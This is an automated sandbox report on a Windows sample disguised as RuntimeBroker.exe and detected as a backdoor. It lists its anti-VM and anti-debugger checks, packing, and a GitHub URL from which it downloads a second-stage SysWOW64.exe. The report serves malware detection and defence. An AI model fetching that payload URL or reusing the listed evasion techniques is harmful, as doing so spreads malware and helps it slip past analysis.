
Windows Analysis Report
RuntimeBroker.exe

Overview

General Information

Sample name: RuntimeBroker.exe
Analysis ID: 1651706
MD5: 61fd0424631fc50f17989c516950935e
SHA1: 8b616f88f47a9aa473512a91a8b3b39a7949aff7
SHA256: c829147f0697e5a7c72e6aaac0b092b4d2a5e3d6a0132d540c49d2ea432877b9
Tags: exe, user-zhuzhu0009

Detection

Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RuntimeBroker.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\RuntimeBroker.exe" MD5: 61FD0424631FC50F17989C516950935E)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\Desktop\RuntimeBroker.exe", CommandLine: "C:\Users\user\Desktop\RuntimeBroker.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\RuntimeBroker.exe, NewProcessName: C:\Users\user\Desktop\RuntimeBroker.exe, OriginalFileName: C:\Users\user\Desktop\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Users\user\Desktop\RuntimeBroker.exe", ProcessId: 7788, ProcessName: RuntimeBroker.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\RuntimeBroker.exe, ProcessId: 7788, TargetFilename: C:\Users\user\AppData\Local\Temp\{8432FDIJOFS-82490FDS-FDSFDU-489324FDS-3Y58FDJ-893UFDS-53HFDJOPFH-GDS94590349-FDSFFDS}\SysWOW64.exe
No Suricata rule has matched

AV Detection

Source: RuntimeBroker.exe | Avira: detected
Source: RuntimeBroker.exe | ReversingLabs: Detection: 38%
Source: Submitted Sample | Neural Call Log Analysis: 96.1%
Source: unknown | HTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: RuntimeBroker.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global traffic | HTTP traffic detected: GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 140.82.114.4
Source: Joe Sandbox View | IP Address: 185.199.108.133
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: 35.56.3.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.comd
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712

System Summary

Source: RuntimeBroker.exe | Static PE information: section name: (empty)
Source: RuntimeBroker.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05847590
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05848D20
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05841C88
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05840CA8
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05846CC0
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_058499C0
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_058411C8
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05846978
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05840C98
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_058499B0
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05848028
Source: RuntimeBroker.exe, 00000000.00000002.1546987185.0000000001212000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RuntimeBroker.exe
Source: RuntimeBroker.exe | Static PE information: Section: w7 ZLIB complexity 1.0035807291666667
Source: classification engine | Classification label: mal92.evad.winEXE@1/0@4/2
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\RuntimeBroker.exe | File created: C:\Users\user\AppData\Local\Temp\{8432FDIJOFS-82490FDS-FDSFDU-489324FDS-3Y58FDJ-893UFDS-53HFDJOPFH-GDS94590349-FDSFFDS}
Source: RuntimeBroker.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RuntimeBroker.exe | ReversingLabs: Detection: 38%
Source: C:\Users\user\Desktop\RuntimeBroker.exe | File read: C:\Users\user\Desktop\RuntimeBroker.exe
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\RuntimeBroker.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RuntimeBroker.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RuntimeBroker.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Users\user\Desktop\RuntimeBroker.exe | Unpacked PE file: 0.2.RuntimeBroker.exe.bc0000.0.unpack :EW;Unknown_Section1:ER;Unknown_Section2:R;.Enigma:EW;UPX:ER;zjifahsi:R;.UPX:R;.reloc:R; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:EW;Unknown_Section4:ER;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;
Source: RuntimeBroker.exe | Static PE information: 0xA6EAA72C [Fri Sep 27 23:47:56 2058 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: UPX
Source: RuntimeBroker.exe | Static PE information: section name: w7
Source: RuntimeBroker.exe | Static PE information: section name: (empty)
Source: RuntimeBroker.exe | Static PE information: section name: (empty)
Source: RuntimeBroker.exe | Static PE information: section name: .Enigma
Source: RuntimeBroker.exe | Static PE information: section name: UPX
Source: RuntimeBroker.exe | Static PE information: section name: zjifahsi
Source: RuntimeBroker.exe | Static PE information: section name: .UPX
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_05844532 pushfd ; iretd 0_2_05844531
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_058444E2 pushfd ; iretd 0_2_05844531
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_0584696D pushfd ; iretd 0_2_05846975
Source: RuntimeBroker.exe | Static PE information: section name: w7 entropy: 7.939048109812574
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Process information set: NOOPENFILEERRORBOX (52 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\RuntimeBroker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Memory allocated: 3320000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Memory allocated: 3320000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Memory allocated: 5320000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RuntimeBroker.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\RuntimeBroker.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\RuntimeBroker.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599884
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599755
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599625
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599494
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599364
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 599028
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598911
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598793
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Window / User API: threadDelayed 1048
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Window / User API: threadDelayed 1530
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7884 | Thread sleep count: 1048 > 30
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7884 | Thread sleep count: 1530 > 30
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599884s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599755s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599494s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599364s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -599028s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598911s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598793s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876 | Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\RuntimeBroker.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Last function: Thread delayed
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q"SOFTWARE\VMware, Inc.\VMware Tools
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q'C:\WINDOWS\system32\drivers\vmmouse.sys
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RuntimeBroker.exe, 00000000.00000002.1548099069.00000000012CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\RuntimeBroker.exe | Code function: 0_2_0584EF80 CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Queries volume information: C:\Users\user\Desktop\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RuntimeBroker.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 321 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 151 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 22 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
RuntimeBroker.exe | 39% | ReversingLabs | Win32.Trojan.Generic
RuntimeBroker.exe | 100% | Avira | BDS/Backdoor.Gen
SAMPLE | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://raw.githubusercontent.comd | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ax-9999.ax-msedge.net | 150.171.28.254 | true | false | - | high
github.com | 140.82.114.4 | true | false | - | high
raw.githubusercontent.com | 185.199.108.133 | true | false | - | high
c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com | unknown | unknown | false | - | high
35.56.3.0.in-addr.arpa | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://github.com/cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe | RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://raw.githubusercontent.com | RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://raw.githubusercontent.comd | RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com | RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://raw.githubusercontent.com | RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
140.82.114.4 | github.com | United States | 36459 | GITHUBUS | false
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1651706
                        Start date and time:2025-03-29 13:59:20 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RuntimeBroker.exe
                        Detection:MAL
                        Classification:mal92.evad.winEXE@1/0@4/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 26
                        • Number of non-executed functions: 1
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Excluded IPs from analysis (whitelisted): 23.96.180.189, 20.12.23.50, 20.3.187.198, 150.171.28.254, 2.23.227.208
                        • Excluded domains from analysis (whitelisted): www.bing.com, ax-ring.msedge.net, fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-v2-ncus.northcentralus.cloudapp.azure.com, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:00:36 | API Interceptor | 15x Sleep call for process: RuntimeBroker.exe modified
Match (IP): Associated Sample Name / URL | Detection | Threat Name | Context

140.82.114.4:
  • Revised - College of the canyons 2025 Handbook80114.doc | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • https://publuu.com/flip-book/830106/1826131 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • https://publuu.com/flip-book/830106/1826131 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • https://fairwaymarket.cloud/TWFyay5SdWRlQEhzY3BvbHkuQ29t## | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • Nationalmi_receipt0291.svg | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • https://digstudio.sharefile.com/public/share/web-sf9877201d645406b84b8dca7035ef0a9 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • Revised - Hartzellprop.com 2025 Handbook29828.doc | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • suspectTelling clean needful (78.2 KB).msg | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7 | malicious | HTMLPhisher, Invisible JS, Tycoon2FA
  • h2H2R15NDO.exe | malicious | LummaC Stealer

185.199.108.133:
  • cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
  • vF20HtY4a4.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
  • VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
  • OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
  • gaber.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
  • cr_asm.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Match (domain): Associated Sample Name / URL | Detection | Threat Name | Context

